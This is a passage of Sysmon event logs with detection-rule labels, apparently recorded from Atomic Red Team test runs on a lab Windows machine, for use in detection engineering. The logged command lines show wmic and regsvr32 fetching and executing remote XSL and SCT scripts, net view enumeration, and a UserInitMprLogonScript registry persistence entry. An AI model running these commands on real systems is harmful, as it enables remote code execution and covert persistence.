14:50:19.495"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":3755,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":13,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:19.516948Z"},"Version":2}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:list","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:list\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8CF-5D31-0000-00109B603300","ParentProcessId":5380,"ProcessGuid":"747F3D96-D8D0-5D31-0000-0010F3623300","ProcessId":7040,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:50:56.021"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3763,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:50:56.047770Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["XSL Script Processing","SquiblyTwo"],"event":{"Event":{"EventData":{"CommandLine":"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"WMI Commandline Utility","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4004528344D02FD143DAFD94BFE056041B633E0D,MD5=390B2038C9ED2C94AB505921BC827FC7,SHA256=34C4ED50A3441BD7CB6411749771C637A8C18C791525D8FCB5AE71B0B1969BA6,IMPHASH=AF8CD6625FCE3244397EE550EFF4091E","Image":"C:\\Windows\\System32\\wbem\\WMIC.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"wmic.exe process /FORMAT:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1220/src/wmicscript.xsl\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DA-5D31-0000-0010D3833300","ParentProcessId":5340,"ProcessGuid":"747F3D96-D8DA-5D31-0000-001029863300","ProcessId":3220,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:06.748"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3766,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:06.753240Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view /domain","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view /domain\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8DD-5D31-0000-0010EF923300","ParentProcessId":4856,"ProcessGuid":"747F3D96-D8DD-5D31-0000-001043953300","ProcessId":3012,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:09.839"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3769,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:09.845415Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Net.exe Execution","Windows Network Enumeration"],"event":{"Event":{"EventData":{"CommandLine":"net view","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Net Command","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=4F4970C3545972FEA2BC1984D597FC810E6321E0,MD5=AE61D8F04BCDE8158304067913160B31,SHA256=25C8266D2BC1D5626DCDF72419838B397D28D44D00AC09F02FF4E421B43EC369,IMPHASH=57F0C47AE2A1A2C06C8B987372AB0B07","Image":"C:\\Windows\\System32\\net.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"net view\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D8EA-5D31-0000-001030B63300","ParentProcessId":1988,"ProcessGuid":"747F3D96-D8EA-5D31-0000-00108AB83300","ProcessId":4684,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:51:22.330"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":3771,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:51:22.333688Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001041E83700","ParentProcessId":4444,"ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:42.834"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4033,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.841951Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ProcessId":2332,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:42.961"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4034,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:42.964349Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:C:\\AtomicRedTeam\\atomics\\T1117\\RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D976-5D31-0000-001093EA3700","ParentProcessId":2332,"ProcessGuid":"747F3D96-D977-5D31-0000-00100A0E3800","ProcessId":3848,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:43.339"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4035,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:43.445040Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Flags Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010442F3800","ParentProcessId":2832,"ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:44.049"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4038,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.054072Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"Company":"Microsoft Corporation","Description":"Windows ® Script Component Runtime","FileVersion":"5.812.10240.16384","Hashes":"SHA1=5B139E692D2A376CCA16D536612EF87AD946EC6B,MD5=3F4DB17E9534DB1CEDA28FF77C27F535,SHA256=14A2C790E3E82DAF7918B61AB79F84228E7CA4494F5C2D311A1179CCA67B02C2,IMPHASH=C928D4D30D6B6FC0A3B011AA381044CA","Image":"C:\\Windows\\System32\\regsvr32.exe","ImageLoaded":"C:\\Windows\\System32\\scrobj.dll","ProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ProcessId":2076,"Product":"Microsoft ® Windows ® Script Component Runtime","RuleName":"","Signature":"Microsoft Windows","SignatureStatus":"Valid","Signed":"true","UtcTime":"2019-07-19 14:53:44.103"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":7,"EventRecordID":4039,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":7,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:44.117123Z"},"Version":3}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Command Line Without DLL"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\System32\\calc.exe\" ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Calculator","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=F5ED372FD8EC7C455FF66BCE73F16CA51CBC0302,MD5=DEAD69D07BC33B762ABD466FB6F53E11,SHA256=3091E2ABFB55D05D6284B6C4B058B62C8C28AFC1D883B699E9A2B5482EC6FD51,IMPHASH=8EEAA9499666119D13B3F44ECD77A729","Image":"C:\\Windows\\System32\\calc.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D978-5D31-0000-0010EB313800","ParentProcessId":2076,"ProcessGuid":"747F3D96-D97A-5D31-0000-00105DA83800","ProcessId":4336,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.135"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4041,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.204886Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\syswow64\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-00109DDC3800","ProcessId":3564,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.831"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4044,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.848703Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Anomaly","Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=FC99212A5F929D707AF49E8151CAB1E30FF658EB,MD5=DA0E9A7777D16AE18BD9C642A9F42223,SHA256=F098FA150D9199732B4EC2E81528A951503A30F75AFEBF7E7A48360301758C67,IMPHASH=0235FF9A007804882636BCCCFB4D1A2F","Image":"C:\\Windows\\System32\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ProcessId":5828,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:46.867"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4045,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:46.893188Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Regsvr32 Network Activity"],"event":{"Event":{"EventData":{"CommandLine":" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Microsoft(C) Register Server","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=CE09FA2A1DD10D0F675A1F0513F3C4EE4D7C3AC0,MD5=4D97D6FC07642D4F744C8C59DB674302,SHA256=E0E722A00C127E0425D2078E738B7A684C9F55A9BF521C67E9A40D796C8BE0E9,IMPHASH=99BBF1337F3DA5CFAB67854DF4ADE1D8","Image":"C:\\Windows\\SysWOW64\\regsvr32.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\regsvr32.exe\" /s C:\\AtomicRedTeam\\atomics\\T1117\\bin\\AllTheThingsx86.dll","ParentImage":"C:\\Windows\\System32\\regsvr32.exe","ParentProcessGuid":"747F3D96-D97A-5D31-0000-001019DE3800","ParentProcessId":5828,"ProcessGuid":"747F3D96-D97B-5D31-0000-00109DEB3800","ProcessId":5788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:47.056"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4047,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:47.083068Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"powershell","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentProcessGuid":"747F3D96-D6F7-5D31-0000-00104ACE2500","ParentProcessId":3912,"ProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ProcessId":4240,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:54.968"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4049,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:54.976854Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Logon Scripts (UserInitMprLogonScript)"],"event":{"Event":{"EventData":{"CommandLine":"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d cmd.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\AtomicRedTeam\\","Description":"Registry Console Tool","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=429DF8371B437209D79DC97978C33157D1A71C4B,MD5=8A93ACAC33151793F8D52000071C0B06,SHA256=19316D4266D0B776D9B2A05D5903D8CBC8F0EA1520E9C2A7E6D5960B6FA4DCAF,IMPHASH=BE482BE427FE212CFEF2CDA0E61F19AC","Image":"C:\\Windows\\System32\\reg.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-D4B4-5D31-0000-002051090500","LogonId":"0x50951","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" /c \"REG.exe ADD HKCU\\Environment /v UserInitMprLogonScript /t REG_MULTI_SZ /d \" cmd.exe","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-D982-5D31-0000-0010DC633900","ParentProcessId":4240,"ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-19 14:53:55.010"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4050,"Execution_attributes":{"ProcessID":2796,"ThreadID":3592},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider_attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"},"Security_attributes":{"UserID":"S-1-5-18"},"Task":1,"TimeCreated_attributes":{"SystemTime":"2019-07-19T14:53:55.018275Z"},"Version":5}},"Event_attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","Logon Scripts (UserInitMprLogonScript) Registry","UAC Bypass via Event Viewer"],"event":{"Event":{"EventData":{"Details":"Binary Data","EventType":"SetValue","Image":"C:\\Windows\\system32\\reg.exe","ProcessGuid":"747F3D96-D983-5D31-0000-00102E663900","ProcessId":3608,"RuleName":"","TargetObject":"HKU\\S-1-5-21-3461203602-4096304019-2269080069-1000\\Environment\\UserInitMprLogonScript","UtcTime":"2019-07-19 